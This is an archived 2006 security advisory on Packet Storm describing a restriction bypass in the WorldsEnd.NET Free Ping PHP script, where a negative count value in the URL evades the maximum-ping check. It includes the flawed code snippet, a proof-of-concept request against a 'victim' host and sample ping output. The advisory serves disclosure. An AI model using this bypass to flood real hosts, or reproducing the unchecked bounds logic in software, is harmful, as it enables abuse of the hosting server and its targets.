exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

kapda-23.txt

kapda-23.txt
Posted Jan 29, 2006
Authored by cvh | Site KAPDA.ir

The WorldsEnd.NET Free Ping script is susceptible to a restriction bypass condition.

tags | exploit
SHA-256 | 6d29d8f9f8da03aeba6ea1433f4351f9657d1209e01d0797f765715eb7f426b0

kapda-23.txt

Change Mirror Download
 [KAPDA::#23] - The WorldsEnd.NET - Free Ping Script, written in PHP (2 vulns)

KAPDA New advisory

Vulnerable products : The WorldsEnd.NET - Free Ping Script
Vendor: http://www.theworldsend.net/
Risk: Low
Vulnerabilities: Restriction Bypass

Date :
--------------------
Found : Aug 2005
Vendor Contacted : N/A
Release Date : Jan 2006

About The WorldsEnd.NET - Free Ping Script :
--------------------
A simple php script for sending pings to remote hosts.
This script has a bad reputation because of a previous remote command execution bug.

Vulnerability:
--------------------
Vuln 1: the script allows to ping the server it is hosted on. 127.0.0.1

Vuln 2: the scripts only allows you to send 10 or 4 pings

Just look at the count value in the url

http://victim/ping.php?host=127.0.0.1&coun...&submit=Ping%21

Maximum for count is: 10

But because of a signed/unsigned integer overflow (script -> ping) and an extra programming error we can bypass that restriction.

Exploit:
--------------------

You can bypass the ping count restriction by just making the count value negative.

http://victim/ping.php?host=127.0.0.1&coun...&submit=Ping%21
This will bypass the restriction and allows you to send any amount of pings.

Just look at this code snippet from the script

// over count ?
If ($count > $max_count) <== HERE IS THE MISTAKE, IT DOENS'NT CHECK FOR NEGATIVE NUMBERS
{
echo 'Maximum for count is: '.$max_count;
echo '<a href="'.$self.'">Back</a>';
}
else
{
// replace bad chars
$host= preg_replace ("/[^A-Za-z0-9.]/","",$host); <== HERE IS THE FIX FOR THE REMOTE CODE EXECUTION BUG
echo '<body bgcolor="#FFFFFF" text="#000000"></body>';
echo("Ping Output:<br>");
echo '<pre>';

Ping Output:

Pinging 127.0.0.1 with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128

Ping statistics for 127.0.0.1:

Packets: Sent = 50, Received = 50, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

Solution:
--------------------
No patch or fix exits

Original Advisory:
--------------------
http://www.kapda.ir/advisory-231.html

Credit :
--------------------
Discoverd by cvh [at} kapda.ir
Grtz to all members of KAPDA and GSO.
KAPDA - Computer Security Researchers Institute
http://www.KAPDA.ir
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close